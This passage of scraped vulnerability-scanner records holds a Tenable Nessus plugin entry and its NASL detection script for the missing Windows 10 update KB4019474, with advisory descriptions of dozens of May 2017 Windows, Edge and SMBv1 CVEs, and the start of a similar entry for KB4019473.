An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n 
\"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. 
A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. 
(CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019474/windows-10-update-kb4019474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01ec841b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019474.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019474' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). 
(CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
